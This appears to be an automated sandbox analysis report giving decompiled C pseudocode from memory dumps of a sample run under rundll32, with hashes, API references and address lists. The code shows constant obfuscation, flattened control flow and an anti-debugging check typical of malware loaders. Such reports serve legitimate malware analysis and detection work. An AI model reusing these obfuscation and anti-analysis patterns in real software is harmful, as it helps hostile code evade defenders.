                                                                                                                      				_v48 = _v48 ^ 0x000e3e3b;
                                                                                                                      				_v52 = 0x57df31;
                                                                                                                      				_t234 = 0x5e;
                                                                                                                      				_v52 = _v52 / _t234;
                                                                                                                      				_v52 = _v52 >> 4;
                                                                                                                      				_v52 = _v52 << 0x10;
                                                                                                                      				_v52 = _v52 ^ 0x0ef79a5c;
                                                                                                                      				_v8 = 0x5569b0;
                                                                                                                      				_v8 = _v8 >> 0xd;
                                                                                                                      				_v8 = _v8 ^ 0x000ef288;
                                                                                                                      				_v44 = 0x5fa9ce;
                                                                                                                      				_v44 = _v44 + 0xffff7bdd;
                                                                                                                      				_v44 = _v44 << 1;
                                                                                                                      				_t235 = 0x65;
                                                                                                                      				_v44 = _v44 / _t235;
                                                                                                                      				_v44 = _v44 ^ 0x000c777c;
                                                                                                                      				_v36 = 0x515ebf;
                                                                                                                      				_v36 = _v36 | 0x64797e59;
                                                                                                                      				_v36 = _v36 ^ 0x4915d5d4;
                                                                                                                      				_v36 = _v36 ^ 0x2d62d183;
                                                                                                                      				_v16 = 0xf90c33;
                                                                                                                      				_v16 = _v16 * 0x1d;
                                                                                                                      				_v16 = _v16 ^ 0x1c3bb4ce;
                                                                                                                      				_v80 = 0x303e6a;
                                                                                                                      				_v80 = _v80 + 0xaf21;
                                                                                                                      				_v80 = _v80 ^ 0x45872c25;
                                                                                                                      				_v80 = _v80 + 0xffff3867;
                                                                                                                      				_v80 = _v80 ^ 0x45bdee21;
                                                                                                                      				_v20 = 0xb8b4ba;
                                                                                                                      				_v20 = _v20 + 0x3a99;
                                                                                                                      				_v20 = _v20 ^ 0x00b083c3;
                                                                                                                      				_v40 = 0xb582c8;
                                                                                                                      				_v40 = _v40 + 0x432d;
                                                                                                                      				_v40 = _v40 | 0xfff7ef9a;
                                                                                                                      				_v40 = _v40 ^ 0xfff9a351;
                                                                                                                      				_v24 = 0x3e85d;
                                                                                                                      				_v24 = _v24 * 0x1b;
                                                                                                                      				_v24 = _v24 + 0xffffd227;
                                                                                                                      				_v24 = _v24 ^ 0x006c1bcc;
                                                                                                                      				_v4 = 0x28c504;
                                                                                                                      				_v4 = _v4 + 0xffffee75;
                                                                                                                      				_v4 = _v4 ^ 0x002a9648;
                                                                                                                      				do {
                                                                                                                      					while(_t262 != 0x8d90b87) {
                                                                                                                      						if(_t262 == 0x991fac7) {
                                                                                                                      							return E002BF88A(_v40, _v24, _v4,  *(_t261 + 0x30));
                                                                                                                      						}
                                                                                                                      						if(_t262 == 0xa3f1429) {
                                                                                                                      							_push(_t235);
                                                                                                                      							_t224 = E002C8D71(_v64, _v68, __eflags, _v72, _v76, _t227);
                                                                                                                      							_t265 =  &(_t264[4]);
                                                                                                                      							 *(_t261 + 0x30) = _t224;
                                                                                                                      							__eflags = _t224;
                                                                                                                      							if(_t224 != 0) {
                                                                                                                      								E002BEE05(_v56, _v32, _v60, _t224, _t224);
                                                                                                                      								_t235 =  *(_t261 + 0x30);
                                                                                                                      								E002CE713(_t235, _v12, _v48, _v52);
                                                                                                                      								_t264 =  &(_t265[6]);
                                                                                                                      								_t262 = 0x8d90b87;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t262 == 0xd46e588) {
                                                                                                                      								_t262 = 0xa3f1429;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t262 != 0xf9322b8) {
                                                                                                                      									goto L14;
                                                                                                                      								} else {
                                                                                                                      									_t235 = E002B2F34;
                                                                                                                      									_t224 = E002C4EFF(E002B2F34, _v36, E002B2F34, E002B2F34, _v16, _v80, E002B2F34, _v20, _t261);
                                                                                                                      									_t264 =  &(_t264[8]);
                                                                                                                      									 *(_t261 + 0x24) = _t224;
                                                                                                                      									if(_t224 == 0) {
                                                                                                                      										_t262 = 0x991fac7;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						return _t224;
                                                                                                                      						L18:
                                                                                                                      					}
                                                                                                                      					_t235 = _v8;
                                                                                                                      					_t222 = E002C2BDE(_t235,  *(_t261 + 0x30), _v44);
                                                                                                                      					_t264 =  &(_t264[1]);
                                                                                                                      					 *(_t261 + 0xc) = _t222;
                                                                                                                      					__eflags = _t222;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t262 = 0x991fac7;
                                                                                                                      						goto L14;
                                                                                                                      					} else {
                                                                                                                      						_t262 = 0xf9322b8;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L18;
                                                                                                                      					L14:
                                                                                                                      					__eflags = _t262 - 0x74fce14;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t224;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !p$#l</$-C$Y~yd$j>0$w
                                                                                                                      • API String ID: 0-1896768906
                                                                                                                      • Opcode ID: 457e01b4b2d249e3f0b47c816cbea6e1a24d4a218a92b6a82084fa0b15282e13
                                                                                                                      • Instruction ID: 903b4111f1d1f32f0888aad38ca0ab4d1df131e8ce774babf3dca416d94936e0
                                                                                                                      • Opcode Fuzzy Hash: 457e01b4b2d249e3f0b47c816cbea6e1a24d4a218a92b6a82084fa0b15282e13
                                                                                                                      • Instruction Fuzzy Hash: 12A17571818781AFD358CF24C88991BFBF1BBC4398F408A1DF59696260D7B1D9598F83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 100357B5
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 100357CA
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(10049C70), ref: 100357D5
                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 100357F1
                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 100357F8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2579439406-0
                                                                                                                      • Opcode ID: a3b530651e130d006cdad9593b6537dae4cc17848e5dd1109e30e69b3ede4491
                                                                                                                      • Instruction ID: 507c20c1e61512489ef28f25289f4d37d9bc9ee57db3d69d2177bc050be51aa9
                                                                                                                      • Opcode Fuzzy Hash: a3b530651e130d006cdad9593b6537dae4cc17848e5dd1109e30e69b3ede4491
                                                                                                                      • Instruction Fuzzy Hash: 3D21FFB4801320CFFB11DF28EDC56483BA4FB88315F10206AE50D87A71EBB16680AF56
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E002C2BF6() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				void* _v1572;
                                                                                                                      				intOrPtr _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _v1684;
                                                                                                                      				signed int _v1688;
                                                                                                                      				signed int _v1692;
                                                                                                                      				signed int _v1696;
                                                                                                                      				signed int _v1700;
                                                                                                                      				signed int _v1704;
                                                                                                                      				signed int _v1708;
                                                                                                                      				signed int _v1712;
                                                                                                                      				signed int _v1716;
                                                                                                                      				signed int _v1720;
                                                                                                                      				signed int _v1724;
                                                                                                                      				signed int _v1728;
                                                                                                                      				signed int _v1732;
                                                                                                                      				signed int _v1736;
                                                                                                                      				signed int _v1740;
                                                                                                                      				signed int _v1744;
                                                                                                                      				signed int _v1748;
                                                                                                                      				signed int _v1752;
                                                                                                                      				signed int _v1756;
                                                                                                                      				signed int _v1760;
                                                                                                                      				void* _t442;
                                                                                                                      				intOrPtr _t446;
                                                                                                                      				intOrPtr _t448;
                                                                                                                      				signed int _t458;
                                                                                                                      				signed int _t460;
                                                                                                                      				void* _t461;
                                                                                                                      				void* _t492;
                                                                                                                      				signed int _t502;
                                                                                                                      				intOrPtr _t503;
                                                                                                                      				intOrPtr* _t504;
                                                                                                                      				signed int _t505;
                                                                                                                      				signed int _t506;
                                                                                                                      				signed int _t507;
                                                                                                                      				signed int _t508;
                                                                                                                      				signed int _t509;
                                                                                                                      				signed int _t510;
                                                                                                                      				signed int _t511;
                                                                                                                      				signed int _t512;
                                                                                                                      				signed int _t513;
                                                                                                                      				signed int _t514;
                                                                                                                      				void* _t515;
                                                                                                                      				signed int* _t518;
                                                                                                                      				void* _t521;
                                                                                                                      
                                                                                                                      				_t518 =  &_v1760;
                                                                                                                      				_v1576 = 0xf21b90;
                                                                                                                      				_v1596 = _v1596 & 0x00000000;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t505 = 0x2b;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t461 = 0x34076d8;
                                                                                                                      				asm("stosd");
                                                                                                                      				_v1580 = 0xbaeef6;
                                                                                                                      				_v1580 = _v1580 + 0xba3c;
                                                                                                                      				_v1580 = _v1580 ^ 0x00bba91b;
                                                                                                                      				_v1660 = 0x2ae6d5;
                                                                                                                      				_v1660 = _v1660 << 6;
                                                                                                                      				_v1660 = _v1660 / _t505;
                                                                                                                      				_v1660 = _v1660 ^ 0x0030dab5;
                                                                                                                      				_v1716 = 0xb009df;
                                                                                                                      				_v1716 = _v1716 ^ 0xf6c25862;
                                                                                                                      				_v1716 = _v1716 + 0xcd46;
                                                                                                                      				_v1716 = _v1716 + 0x716d;
                                                                                                                      				_v1716 = _v1716 ^ 0xf6739072;
                                                                                                                      				_v1588 = 0x61188e;
                                                                                                                      				_v1588 = _v1588 ^ 0xbe54106a;
                                                                                                                      				_v1588 = _v1588 ^ 0xbe3508e6;
                                                                                                                      				_v1600 = 0x5c78c8;
                                                                                                                      				_v1600 = _v1600 | 0xa4208796;
                                                                                                                      				_v1600 = _v1600 ^ 0xa47cffde;
                                                                                                                      				_v1684 = 0xfd831d;
                                                                                                                      				_v1684 = _v1684 << 5;
                                                                                                                      				_v1684 = _v1684 >> 0xc;
                                                                                                                      				_v1684 = _v1684 ^ 0x0001fb16;
                                                                                                                      				_v1608 = 0x3a7886;
                                                                                                                      				_v1608 = _v1608 + 0xffff806f;
                                                                                                                      				_v1608 = _v1608 ^ 0x003b1c87;
                                                                                                                      				_v1616 = 0x5dea07;
                                                                                                                      				_t506 = 9;
                                                                                                                      				_v1616 = _v1616 * 0x59;
                                                                                                                      				_v1616 = _v1616 ^ 0x20ad8776;
                                                                                                                      				_v1708 = 0xdb05ba;
                                                                                                                      				_v1708 = _v1708 ^ 0x457fa961;
                                                                                                                      				_v1708 = _v1708 | 0x4dd1de05;
                                                                                                                      				_v1708 = _v1708 + 0xffff2bcd;
                                                                                                                      				_v1708 = _v1708 ^ 0x4dffde68;
                                                                                                                      				_v1740 = 0x5f9fa;
                                                                                                                      				_v1740 = _v1740 >> 0x10;
                                                                                                                      				_v1740 = _v1740 * 0x47;
                                                                                                                      				_v1740 = _v1740 / _t506;
                                                                                                                      				_v1740 = _v1740 ^ 0x0003f3c1;
                                                                                                                      				_v1700 = 0xeda1e9;
                                                                                                                      				_v1700 = _v1700 << 0xb;
                                                                                                                      				_t507 = 0x4c;
                                                                                                                      				_v1700 = _v1700 * 0x17;
                                                                                                                      				_v1700 = _v1700 ^ 0xcc50fc90;
                                                                                                                      				_v1688 = 0xc376bf;
                                                                                                                      				_v1688 = _v1688 + 0xffffce34;
                                                                                                                      				_v1688 = _v1688 << 0xf;
                                                                                                                      				_v1688 = _v1688 ^ 0xa27d2095;
                                                                                                                      				_v1736 = 0x77df39;
                                                                                                                      				_v1736 = _v1736 >> 4;
                                                                                                                      				_v1736 = _v1736 >> 7;
                                                                                                                      				_v1736 = _v1736 / _t507;
                                                                                                                      				_v1736 = _v1736 ^ 0x0006bba1;
                                                                                                                      				_v1744 = 0xdb3f7a;
                                                                                                                      				_v1744 = _v1744 << 0xc;
                                                                                                                      				_t508 = 0x46;
                                                                                                                      				_v1744 = _v1744 / _t508;
                                                                                                                      				_t509 = 0x2e;
                                                                                                                      				_v1744 = _v1744 / _t509;
                                                                                                                      				_v1744 = _v1744 ^ 0x0009adba;
                                                                                                                      				_v1620 = 0x28e24f;
                                                                                                                      				_v1620 = _v1620 << 1;
                                                                                                                      				_v1620 = _v1620 ^ 0x00586b21;
                                                                                                                      				_v1720 = 0xedf2ea;
                                                                                                                      				_v1720 = _v1720 >> 0xd;
                                                                                                                      				_v1720 = _v1720 << 0xd;
                                                                                                                      				_v1720 = _v1720 + 0xd060;
                                                                                                                      				_v1720 = _v1720 ^ 0x00e1c656;
                                                                                                                      				_v1728 = 0x3692b9;
                                                                                                                      				_v1728 = _v1728 + 0xffff0cc0;
                                                                                                                      				_v1728 = _v1728 ^ 0x15726ff1;
                                                                                                                      				_v1728 = _v1728 << 7;
                                                                                                                      				_v1728 = _v1728 ^ 0xa3f1c3b7;
                                                                                                                      				_v1628 = 0xe9d0b6;
                                                                                                                      				_v1628 = _v1628 + 0xffff0b2c;
                                                                                                                      				_v1628 = _v1628 ^ 0x00e13fcd;
                                                                                                                      				_v1672 = 0xb5656;
                                                                                                                      				_v1672 = _v1672 << 1;
                                                                                                                      				_t510 = 0x75;
                                                                                                                      				_v1672 = _v1672 / _t510;
                                                                                                                      				_v1672 = _v1672 ^ 0x0000c760;
                                                                                                                      				_v1636 = 0xb446a;
                                                                                                                      				_t511 = 0x66;
                                                                                                                      				_v1636 = _v1636 * 0x2c;
                                                                                                                      				_v1636 = _v1636 ^ 0x01e018a2;
                                                                                                                      				_v1612 = 0x7754cf;
                                                                                                                      				_v1612 = _v1612 ^ 0x9195c63c;
                                                                                                                      				_v1612 = _v1612 ^ 0x91eaa7e8;
                                                                                                                      				_v1656 = 0x90fdf5;
                                                                                                                      				_v1656 = _v1656 | 0x8a72400d;
                                                                                                                      				_v1656 = _v1656 / _t511;
                                                                                                                      				_v1656 = _v1656 ^ 0x015bbc23;
                                                                                                                      				_v1664 = 0xea1595;
                                                                                                                      				_v1664 = _v1664 ^ 0x656fc689;
                                                                                                                      				_t512 = 0x1d;
                                                                                                                      				_v1664 = _v1664 / _t512;
                                                                                                                      				_v1664 = _v1664 ^ 0x0381a839;
                                                                                                                      				_v1724 = 0x1903df;
                                                                                                                      				_v1724 = _v1724 ^ 0xd471d85a;
                                                                                                                      				_v1724 = _v1724 << 9;
                                                                                                                      				_v1724 = _v1724 + 0xa250;
                                                                                                                      				_v1724 = _v1724 ^ 0xd1be858e;
                                                                                                                      				_v1592 = 0x634acd;
                                                                                                                      				_v1592 = _v1592 >> 1;
                                                                                                                      				_v1592 = _v1592 ^ 0x0031fc8c;
                                                                                                                      				_v1624 = 0x214267;
                                                                                                                      				_v1624 = _v1624 >> 0xe;
                                                                                                                      				_v1624 = _v1624 ^ 0x000cae4b;
                                                                                                                      				_v1748 = 0xf70b55;
                                                                                                                      				_v1748 = _v1748 ^ 0x8376c783;
                                                                                                                      				_v1748 = _v1748 + 0xffff9546;
                                                                                                                      				_v1748 = _v1748 ^ 0x30c8a062;
                                                                                                                      				_v1748 = _v1748 ^ 0xb347cf79;
                                                                                                                      				_v1644 = 0x4a974c;
                                                                                                                      				_v1644 = _v1644 + 0xf754;
                                                                                                                      				_v1644 = _v1644 ^ 0x0044301a;
                                                                                                                      				_v1756 = 0xfefcd0;
                                                                                                                      				_v1756 = _v1756 + 0xffff9941;
                                                                                                                      				_v1756 = _v1756 << 0xc;
                                                                                                                      				_v1756 = _v1756 + 0x3291;
                                                                                                                      				_v1756 = _v1756 ^ 0xe96b65aa;
                                                                                                                      				_v1632 = 0x34bd00;
                                                                                                                      				_v1632 = _v1632 << 0xd;
                                                                                                                      				_v1632 = _v1632 ^ 0x97a30bc0;
                                                                                                                      				_v1676 = 0xf19685;
                                                                                                                      				_t513 = 0x7b;
                                                                                                                      				_v1676 = _v1676 * 0x54;
                                                                                                                      				_v1676 = _v1676 ^ 0x1e84cba5;
                                                                                                                      				_v1676 = _v1676 ^ 0x51c47a4f;
                                                                                                                      				_v1652 = 0x3d5ed0;
                                                                                                                      				_v1652 = _v1652 * 7;
                                                                                                                      				_v1652 = _v1652 / _t513;
                                                                                                                      				_v1652 = _v1652 ^ 0x0004a817;
                                                                                                                      				_v1668 = 0x31208a;
                                                                                                                      				_v1668 = _v1668 << 3;
                                                                                                                      				_v1668 = _v1668 + 0x3afc;
                                                                                                                      				_v1668 = _v1668 ^ 0x0186e9ee;
                                                                                                                      				_v1692 = 0x9120a;
                                                                                                                      				_v1692 = _v1692 + 0xffff3905;
                                                                                                                      				_v1692 = _v1692 ^ 0x12b553f3;
                                                                                                                      				_v1692 = _v1692 ^ 0x12bb5ad6;
                                                                                                                      				_v1680 = 0x26d3f8;
                                                                                                                      				_v1680 = _v1680 << 7;
                                                                                                                      				_v1680 = _v1680 + 0xa827;
                                                                                                                      				_v1680 = _v1680 ^ 0x136c77e8;
                                                                                                                      				_v1584 = 0x751146;
                                                                                                                      				_v1584 = _v1584 << 7;
                                                                                                                      				_v1584 = _v1584 ^ 0x3a8d2dd0;
                                                                                                                      				_v1732 = 0x266ad0;
                                                                                                                      				_v1732 = _v1732 + 0xffffe92f;
                                                                                                                      				_v1732 = _v1732 | 0xe77a0674;
                                                                                                                      				_v1732 = _v1732 << 8;
                                                                                                                      				_v1732 = _v1732 ^ 0x7e56f20f;
                                                                                                                      				_v1640 = 0xc95fbf;
                                                                                                                      				_v1640 = _v1640 >> 1;
                                                                                                                      				_v1640 = _v1640 ^ 0x006563fc;
                                                                                                                      				_v1752 = 0xe51758;
                                                                                                                      				_v1752 = _v1752 + 0x7d69;
                                                                                                                      				_v1752 = _v1752 << 8;
                                                                                                                      				_v1752 = _v1752 >> 5;
                                                                                                                      				_v1752 = _v1752 ^ 0x0727d5ea;
                                                                                                                      				_v1696 = 0x906e7e;
                                                                                                                      				_t514 = 0x72;
                                                                                                                      				_v1696 = _v1696 / _t514;
                                                                                                                      				_v1696 = _v1696 << 0xd;
                                                                                                                      				_v1696 = _v1696 ^ 0x288be572;
                                                                                                                      				_v1760 = 0xae4c89;
                                                                                                                      				_v1760 = _v1760 >> 4;
                                                                                                                      				_v1760 = _v1760 * 0x14;
                                                                                                                      				_v1760 = _v1760 | 0x4c6e4d0e;
                                                                                                                      				_v1760 = _v1760 ^ 0x4cfa322f;
                                                                                                                      				_v1704 = 0x3b4ff5;
                                                                                                                      				_v1704 = _v1704 + 0xd6b6;
                                                                                                                      				_v1704 = _v1704 << 0x10;
                                                                                                                      				_v1704 = _v1704 << 0xe;
                                                                                                                      				_v1704 = _v1704 ^ 0xc00053ef;
                                                                                                                      				_v1604 = 0xa38704;
                                                                                                                      				_v1604 = _v1604 + 0xffffb37d;
                                                                                                                      				_v1604 = _v1604 ^ 0x00a5c604;
                                                                                                                      				_v1712 = 0x302894;
                                                                                                                      				_v1712 = _v1712 << 6;
                                                                                                                      				_v1712 = _v1712 + 0xffffae4b;
                                                                                                                      				_v1712 = _v1712 + 0xffff6004;
                                                                                                                      				_v1712 = _v1712 ^ 0x0c025a19;
                                                                                                                      				_t515 = 0x5a6577d;
                                                                                                                      				_t517 = _v1596;
                                                                                                                      				_t502 = _v1596;
                                                                                                                      				_t460 = _v1596;
                                                                                                                      				_v1648 = 0xc7a381;
                                                                                                                      				_v1648 = _v1648 ^ 0xa2d00ae3;
                                                                                                                      				_v1648 = _v1648 >> 0xa;
                                                                                                                      				_v1648 = _v1648 ^ 0x002465a0;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t492 = 0x5c;
                                                                                                                      					do {
                                                                                                                      						while(1) {
                                                                                                                      							L2:
                                                                                                                      							_t521 = _t461 - _t515;
                                                                                                                      							if(_t521 <= 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							__eflags = _t461 - 0x744da3a;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_push(_v1744);
                                                                                                                      								_push(_v1736);
                                                                                                                      								_push(0x2b10fc);
                                                                                                                      								_t442 = E002BAB66(_v1700, _v1688, __eflags);
                                                                                                                      								E002CC66E( &_v1560, __eflags);
                                                                                                                      								_t446 =  *0x2d520c; // 0x0
                                                                                                                      								_t448 =  *0x2d520c; // 0x0
                                                                                                                      								__eflags = _t448 + 0x220;
                                                                                                                      								E002CBDB5( &_v520, _t448 + 0x220, _v1620, _v1720, _v1728, _v1628, _t448 + 0x220, _v1672, _v1636, _t446 + 8,  &_v1560,  &_v1040, _t442);
                                                                                                                      								E002BAE03(_v1612, _v1656, _v1664, _t442);
                                                                                                                      								_t518 =  &(_t518[0x10]);
                                                                                                                      								_t461 = 0xe241e24;
                                                                                                                      								_t515 = 0x5a6577d;
                                                                                                                      								_t492 = 0x5c;
                                                                                                                      								goto L26;
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t461 - 0xe241e24;
                                                                                                                      								if(_t461 == 0xe241e24) {
                                                                                                                      									_t503 =  *0x2d520c; // 0x0
                                                                                                                      									_t504 = _t503 + 0x220;
                                                                                                                      									while(1) {
                                                                                                                      										__eflags =  *_t504 - _t492;
                                                                                                                      										if( *_t504 == _t492) {
                                                                                                                      											break;
                                                                                                                      										}
                                                                                                                      										_t504 = _t504 + 2;
                                                                                                                      										__eflags = _t504;
                                                                                                                      									}
                                                                                                                      									_t502 = _t504 + 2;
                                                                                                                      									_t461 = 0x4f55465;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t461 - 0xe6f489b;
                                                                                                                      									if(_t461 != 0xe6f489b) {
                                                                                                                      										goto L26;
                                                                                                                      									} else {
                                                                                                                      										E002CE689(_v1704, _v1604, _v1712, _t460, _v1648);
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L20:
                                                                                                                      							return _v1596;
                                                                                                                      						}
                                                                                                                      						if(_t521 == 0) {
                                                                                                                      							E002CE689(_v1640, _v1752, _v1696, _t517, _v1760);
                                                                                                                      							_t518 =  &(_t518[3]);
                                                                                                                      							goto L15;
                                                                                                                      						} else {
                                                                                                                      							if(_t461 == 0x2fdd9cd) {
                                                                                                                      								E002CEE94(_t517, _t460, _v1584, _v1732);
                                                                                                                      								_t461 = _t515;
                                                                                                                      								goto L1;
                                                                                                                      							} else {
                                                                                                                      								if(_t461 == 0x34076d8) {
                                                                                                                      									_push(_t461);
                                                                                                                      									E002BEA7B( &_v1040, _v1608, _v1580, _t461, _v1616, _v1708, _v1740);
                                                                                                                      									_t518 =  &(_t518[7]);
                                                                                                                      									_t461 = 0x744da3a;
                                                                                                                      									while(1) {
                                                                                                                      										L1:
                                                                                                                      										_t492 = 0x5c;
                                                                                                                      										goto L2;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t461 == 0x4f55465) {
                                                                                                                      										_t460 = E002BEB36(_v1724, _v1592, _t461, _v1660);
                                                                                                                      										_t518 =  &(_t518[3]);
                                                                                                                      										__eflags = _t460;
                                                                                                                      										if(_t460 != 0) {
                                                                                                                      											_t461 = 0x5350d19;
                                                                                                                      											while(1) {
                                                                                                                      												L1:
                                                                                                                      												_t492 = 0x5c;
                                                                                                                      												goto L2;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										if(_t461 != 0x5350d19) {
                                                                                                                      											goto L26;
                                                                                                                      										} else {
                                                                                                                      											_t458 = E002C0188(_t461, _v1624, _t460, _v1748, _t502, _v1644, _v1716, _t502, _v1756, _v1632, _v1676, _t461, _v1652, _v1684, _t461, _t461, _v1668, _v1600, _v1692, _t461,  &_v520, _v1588, _v1680);
                                                                                                                      											_t517 = _t458;
                                                                                                                      											_t518 =  &(_t518[0x15]);
                                                                                                                      											if(_t458 == 0) {
                                                                                                                      												L15:
                                                                                                                      												_t461 = 0xe6f489b;
                                                                                                                      												while(1) {
                                                                                                                      													L1:
                                                                                                                      													_t492 = 0x5c;
                                                                                                                      													goto L2;
                                                                                                                      												}
                                                                                                                      											} else {
                                                                                                                      												_t461 = 0x2fdd9cd;
                                                                                                                      												_v1596 = 1;
                                                                                                                      												while(1) {
                                                                                                                      													L1:
                                                                                                                      													_t492 = 0x5c;
                                                                                                                      													goto L2;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L20;
                                                                                                                      						L26:
                                                                                                                      						__eflags = _t461 - 0xbde599c;
                                                                                                                      					} while (_t461 != 0xbde599c);
                                                                                                                      					goto L20;
                                                                                                                      				}
                                                                                                                      			}













































































                                                                                                                      0x002c2e48
                                                                                                                      0x002c2e4d
                                                                                                                      0x002c2e52
                                                                                                                      0x002c2e5a
                                                                                                                      0x002c2e62
                                                                                                                      0x002c2e6a
                                                                                                                      0x002c2e72
                                                                                                                      0x002c2e7a
                                                                                                                      0x002c2e7f
                                                                                                                      0x002c2e87
                                                                                                                      0x002c2e92
                                                                                                                      0x002c2e9d
                                                                                                                      0x002c2ea8
                                                                                                                      0x002c2eb0
                                                                                                                      0x002c2eb8
                                                                                                                      0x002c2ebd
                                                                                                                      0x002c2ec3
                                                                                                                      0x002c2ecb
                                                                                                                      0x002c2ede
                                                                                                                      0x002c2ee1
                                                                                                                      0x002c2ee8
                                                                                                                      0x002c2ef3
                                                                                                                      0x002c2efe
                                                                                                                      0x002c2f09
                                                                                                                      0x002c2f14
                                                                                                                      0x002c2f1c
                                                                                                                      0x002c2f2c
                                                                                                                      0x002c2f30
                                                                                                                      0x002c2f38
                                                                                                                      0x002c2f40
                                                                                                                      0x002c2f4c
                                                                                                                      0x002c2f4f
                                                                                                                      0x002c2f53
                                                                                                                      0x002c2f5b
                                                                                                                      0x002c2f63
                                                                                                                      0x002c2f6b
                                                                                                                      0x002c2f70
                                                                                                                      0x002c2f78
                                                                                                                      0x002c2f80
                                                                                                                      0x002c2f8b
                                                                                                                      0x002c2f92
                                                                                                                      0x002c2f9d
                                                                                                                      0x002c2fa8
                                                                                                                      0x002c2fb0
                                                                                                                      0x002c2fbb
                                                                                                                      0x002c2fc3
                                                                                                                      0x002c2fcb
                                                                                                                      0x002c2fd3
                                                                                                                      0x002c2fdb
                                                                                                                      0x002c2fe3
                                                                                                                      0x002c2ff0
                                                                                                                      0x002c2ffb
                                                                                                                      0x002c3006
                                                                                                                      0x002c300e
                                                                                                                      0x002c3016
                                                                                                                      0x002c301b
                                                                                                                      0x002c3023
                                                                                                                      0x002c302b
                                                                                                                      0x002c3036
                                                                                                                      0x002c303e
                                                                                                                      0x002c3049
                                                                                                                      0x002c3058
                                                                                                                      0x002c305b
                                                                                                                      0x002c305f
                                                                                                                      0x002c3067
                                                                                                                      0x002c306f
                                                                                                                      0x002c3082
                                                                                                                      0x002c3094
                                                                                                                      0x002c309b
                                                                                                                      0x002c30a6
                                                                                                                      0x002c30ae
                                                                                                                      0x002c30b3
                                                                                                                      0x002c30bb
                                                                                                                      0x002c30c3
                                                                                                                      0x002c30cb
                                                                                                                      0x002c30d3
                                                                                                                      0x002c30db
                                                                                                                      0x002c30e3
                                                                                                                      0x002c30eb
                                                                                                                      0x002c30f0
                                                                                                                      0x002c30f8
                                                                                                                      0x002c3100
                                                                                                                      0x002c310b
                                                                                                                      0x002c3113
                                                                                                                      0x002c311e
                                                                                                                      0x002c3126
                                                                                                                      0x002c312e
